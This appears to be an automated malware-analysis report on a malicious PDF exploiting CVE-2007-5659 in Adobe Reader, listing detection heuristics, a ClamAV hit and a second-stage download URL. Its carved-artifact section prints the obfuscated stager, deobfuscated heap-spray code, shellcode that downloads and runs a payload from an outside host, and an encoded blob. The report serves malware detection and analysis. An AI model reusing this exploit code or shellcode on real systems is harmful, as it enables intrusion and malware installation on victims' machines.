MALICIOUS
406
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
T1071.001 Web Protocols
The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a dropper, downloading a second-stage payload from the URL http://gusmon.com/info/sun.html/n002106204r0409R1f79d67aXbbc075feY5b3152f0. The use of String.fromCharCode with hex decoding and anti-analysis checks indicates a malicious intent to evade detection.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 11
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 5 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATEPDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPERPDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
-
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-35901
-
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGERPDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://gusmon.com/info/sun.html/n002106204r0409R1f79d67aXbbc075feY5b3152f0 Referenced by PDF JavaScript
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d |
pdf-javascript-stream | PDF /JS object 9 at offset 0x4143 | 469 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
fnc += 'l';
}
if (app.plugIns.length >= 2)
{
app[fnc]/**/(buf);
}
|
|||
annotation_subject_callee_hex_stage_000.js0c3cf693087f349a029a52f2e7fe2a6fba0e514886d010144bf80ffbdc3a6178 |
deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x19EA | 5180 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var u_L_B__5xd = new Array();var j00d7uv_17_2r = 0;var nf_w0_d = "";function T__5s4_wdkk(cI_hA5Y8, e___R4_A){var Oku_D4__D_SA = e___R4_A.toString();var DG5Nqd6a = "";for(var l14_i_hbI = 0; l14_i_hbI < Oku_D4__D_SA.length; l14_i_hbI++) {var JUYv__D4_K4 = parseInt(Oku_D4__D_SA.substr(l14_i_hbI, 1));if (!isNaN(JUYv__D4_K4)) {JUYv__D4_K4 = JUYv__D4_K4.toString(16);if (JUYv__D4_K4.length == 1) { JUYv__D4_K4 = "0" + JUYv__D4_K4; }else if (JUYv__D4_K4.length != 2) { JUYv__D4_K4 = "00"; }DG5Nqd6a = JUYv__D4_K4 + DG5Nqd6a;if (DG5Nqd6a.length == 8) {break;}}}while(DG5Nqd6a.length < 8) { DG5Nqd6a = "0" + DG5Nqd6a; }var A_iC7_Kj_va = cI_hA5Y8.toString(16);if (A_iC7_Kj_va.length == 1) { A_iC7_Kj_va = "0" + A_iC7_Kj_va; }else if (A_iC7_Kj_va.length != 2) { A_iC7_Kj_va = "00"; }DG5Nqd6a = "3" + A_iC7_Kj_va + "P" + DG5Nqd6a;return DG5Nqd6a;}function aytvP_2(h3__m_1Y, KW6d_Y_WGR_b_b){var m036mc5___3_q8G = new Array("");var SJf_lH__Af7nR88 = h3__m_1Y;var OT4_7v2Kht_HH5v;if ((OT4_7v2Kht_HH5v = h3__m_1Y.lastIndexOf("%u00")) != -1) {if (OT4_7v2Kht_HH5v + 6 == h3__m_1Y.length) {m036mc5___3_q8G[0] = h3__m_1Y.substr(OT4_7v2Kht_HH5v + 4, 2);SJf_lH__Af7nR88 = h3__m_1Y.substring(0, OT4_7v2Kht_HH5v);}}OT4_7v2Kht_HH5v = 1;for (l14_i_hbI = 0; l14_i_hbI < KW6d_Y_WGR_b_b.length; l14_i_hbI++) {var KKO10y = KW6d_Y_WGR_b_b.charCodeAt(l14_i_hbI).toString(16);if (KKO10y.length == 1) { KKO10y = "0" + KKO10y; }m036mc5___3_q8G[OT4_7v2Kht_HH5v] = KKO10y;OT4_7v2Kht_HH5v++;}l14_i_hbI = m036mc5___3_q8G[0].length ? 0 : 1;m036mc5___3_q8G[OT4_7v2Kht_HH5v] = "00";m036mc5___3_q8G[OT4_7v2Kht_HH5v + 1] = "00";OT4_7v2Kht_HH5v += 2;if ((m036mc5___3_q8G.length - l14_i_hbI) % 2) {m036mc5___3_q8G[OT4_7v2Kht_HH5v] = "00";}while(l14_i_hbI < m036mc5___3_q8G.length) {SJf_lH__Af7nR88 += "%u" + m036mc5___3_q8G[l14_i_hbI + 1] + m036mc5___3_q8G[l14_i_hbI];l14_i_hbI += 2;}SJf_lH__Af7nR88 += "%u0000";return SJf_lH__Af7nR88;}function G__ck__Y(P_U8Unxub7__g, S5_xY_KEc_Am2oJ){while (P_U8Unxub7__g.length*2<S5_xY_KEc_Am2oJ) {P_U8Unxub7__g += P_U8Unxub7__g;}P_U8Unxub7__g = P_U8Unxub7__g.substring(0,S5_xY_KEc_Am2oJ/2);return P_U8Unxub7__g;}function XG4m__4a_t_84(T1ymjbI, e______P, r3p7pK37jd){var fi_A_7 = 0x0c0c0c0c;var P_U8Unxub7__g = unescape(e______P);var KW6d_Y_WGR_b_b = T__5s4_wdkk(T1ymjbI, r3p7pK37jd);var re_b65 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var h3__m_1Y = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5070%u416c%u0041%u7468%u7074%u2f3a%u672f%u7375%u6f6d%u2e6e%u6f63%u2f6d%u6e69%u6f66%u732f%u6e75%u682e%u6d74%u2f6c%u306e%u3230%u3031%u3236%u3430%u3072%u3034%u5239%u6631%u3937%u3664%u6137%u6258%u6362%u3730%u6635%u5965%u6235%u3133%u3235%u3066";app.CeJ_QL_3_6 = unescape(aytvP_2(h3__m_1Y, KW6d_Y_WGR_b_b));var I30oA_Q = 0x400000;var qc_S4Ng_g_88N8d = re_b65.length * 2;var S5_xY_KEc_Am2oJ = I30oA_Q - (qc_S4Ng_g_88N8d+0x38);P_U8Unxub7__g = G__ck__Y(P_U8Unxub7__g, S5_xY_KEc_Am2oJ);var t__2___xc = (fi_A_7 - 0x400000)/I30oA_Q;for (var Ond62P = 0; Ond62P < t__2___xc; Ond62P++) {u_L_B__5xd[Ond62P] = P_U8Unxub7__g + re_b65;}}function RN070__0_n(){var D_sd_88 = "";for (l14_i_hbI = 0; l14_i_hb
... (truncated)
|
|||
deobfuscated.jsd9391bc5b6ed1899fbc7bd9b9f9d7dfbdba6577066cc1dc25aa27bfb5fa5606b |
deobfuscated-js | PDF JavaScript deobfuscation pass | 140126 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
2i531h5g32bf4g620442bg59ag78b9a0663i1c97c25b7fbk56aa0kbj2d7i94b415a7bh0511995k65bc842h043918624a5db44b926f2f9b307537567a453c4c95ai2b552e8c75c2170i5j9e255j8b3g6a7ca0484g8h7gah4k170eab8cb7aabe8219748c7bb44274a1a42c7699050d0hb0356k381d18431f396f072104c18790bi3086b0711f1e3824643g704451c16bb8ab34234g4e6a2g3i420eb6166d8342997h886e613h2k8e6a26788a026gad5j8i607b3i979d017ec1ba21aib968b089aj4h2aa163867d5f187f066559092h978c34b0474cad1c17868k6c1bbi8f0f0c51b76g89bd46890hbh304g4gae3d9f3j01ae9j2j610bak22983ibb843e5e9a577j8e37ba065j432e9b3a395i980g606h236b59b2bcbe5b7726b1abc0635e6h7c5h67708e332ea581516da03296b3616j7b123i5k8j7j189802aiagb48d57860b9g962e1j574804011e29bj80bi1073a24dbcbk0e2k98494j3h118j74a66g2b4071437k19684820bh0a2a482d9d027c5f704b44ac66017g3dc061c31daf6d814jaj86835811b53994949074ag0i3423875b807478136ka1541k880j6g581i9i203fa14h1i8c5d34b0a69b2c7h7fbk74a106bf7h0ab2406j5k821j99432786990b2fbbc327b42b12bh45309jc05a67c3b49c2a2a63bk1c192i893k5d39be342hag01730d3ga7098jc32c579b8k3k522d541055138d7g7abb2a7a0d6g623ib025357d6h18bi146a9j7ga48i5i9f9c90315559469kaja5440c8e130687a66ca5b0a60e7h553f3g0jai8ja28j572f756680c055bb032515266i2i70108h7d77404ebd767j690k9k5cbg3k6337603e9e78a9372c044c79873f729jbdb7b05a379dae66b878b34k6kb1268i544115231j6f3b219e5c589881b21i9e469k6h8hag0j4b862f8b7j6287bg9k5e1c6h6b982i36059j6jb4c20h6a2fac037ka14d8d96283186bh150jbd8e3a431kb3026kbh19813129b5039h063d5b8c6i4i0e1g2i0j48bj4c465gbh3c84ba5h6k6e3b5j1a4h8b260c2a785i859i6e6h9c9j8j3b56531gba92164haf7502aa8235947ba28h019h1jb93582939a0e4h11bg4k7b82b34299bh1b0jbf2ha471b50k484kbg36097e7d75b9a06605b856c24a3h9d549f2508475h9da6579jb100a08944258c7j1fb249ae866k8iba67667b2217377h41138932176gbf1j3a852e9e6b051i016998269d613i7faca35f4g5b4jae263k0a018c8fbdb55827959d7ab43h74a6b21k8fc3b2bia7b9777h3f9g21341e1a781h010g16b78b2e3c699i410f0f423j9ebk4h5e4kb57681752j234g4e6a2g3i4h0h1922686h619798a77g9e622h6a2fbk707ha25i195kb15i751ea9960h5f2208300jb5aa859e145h208k4d639g703bb1a5311gbi3c978c16142444064j0f6j73441d898h0f0853146g8dbd1e80bf2f5c868g86359i3645ajaf0c219kc013940k9j7e3e47ai1b595cc0842e5e3a267e231i3hae0j724e2a6k70070d9d2a86ab7c6d0a2b65754c5g456c8b4i52b19k569hc037972k9276411a573d7d8c31a1ac9gagb47h7893bhaebe304h103g9i0gae29bj9k1fb07h9h8c212j2d49ac0f433606ak56036e3j39764f5ibd3j4gahbkbi284b1770988i7g70574aa25401914503522f37854a472j6j8691702e2f5d9cbj57b30d1a49219560a09d4gc16ca1614995337g9a24bj3954a72d0g6c802e960a0h3ba645be4ea4a11c7g131j5b6h499aa07h13198d9g255eai8j2e860202bi7568be1g4d76c37dai0a3c458h1c1j43aj425b2a0h1h4i12079d3b5413ah910a4c668e8i3c5d5j7b487521743e82971f9b127f8c70052g21645h3bc211976h8b8g7g6ea2c27339313d3e9kb10836067cbhai7j1584c0be033eaj4h253d0ib16j0d4i4bb6415i80b85822080h0j426g219k1hbd7f790e228e46948c468h5b1d1e88294j6j8373aa602i446d799d4770afbbb7193d489a913ib28b9i672b71c3515430a90f267i170ga83i16afbfaa2g7b60a348a50c1446ad2c5j774j6eag745626a267b0503hc2bh89ad10054h307c036a9617660e0120719805ag3b83437c531b204b0d3k5c0221280g8c9j3d4j8aa66d2d1e3a0h81c35a3g69bb2ja2ba6g476e363k217d4i1j9h23789c83aba2699a6j641i59230b959ga32db276007g7f258g890ib614ah461a1891ac7c164020006j70708k2017131b24ak23ai6bb7a0673ibe23057d7c7325bd743323671g6g61ab33951e38245h9bb6458f0g0a1j87292398a61fag2c9g6i3i5fbf5a7a4c1had384g284caf45256a8i2g295e2g55419e1d042966b29c6h1e4ba595494g7e7b83484haha965bb00248g46a18c4i844f508d01318f05b5aea7723a4f0ea4ac6g49144dbi2f0kbab7ad2e0d86bi54143b2d326a2g475i1ja46abea34f3d4a4e66b15528b2b1c12i647aaab5aaa6954256633e18aa78096008269851841375750c8j0i0j510jb198b58gbh2a2da7698b9e930a7f2852380g42c07a34022j5aa34d02636834a59h790h9886aa3g5a8d4b61bk03637b5g972b9d0j31078b214g138g17b94706ae6h659a214h5c2684b1243h31840k31618e2h606h176b6iae0cab5250baa1a2295k807h7a3d6k486a445c11ae7g838f0377b36b838abg3e649fb3169i0887b296ad6g69bh8h983d1j122d1fa6ab049e68001j880k8e1j3aai2i8e3e4j4915ak749h932k3f5e2i52b077402e2k2i5979529i8k99878054519a66bk694kc06b033aah7b884e807ib37805b5519g008i9jbg08251587429k72831269247k58bg3g9k581fc3303f8a352c9g7k5892b5bc4e8a6jbk769a102k4ha405615j699c0b993428ab990159bf02117jb719ae755a9e2787a240a0ae3a2k6h7ib6c0139g3k623d205b702b297a3b5a1b9abd084c5e6h856d646e6k22651d963e5i8b319b035i7e7c2a664e6i ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.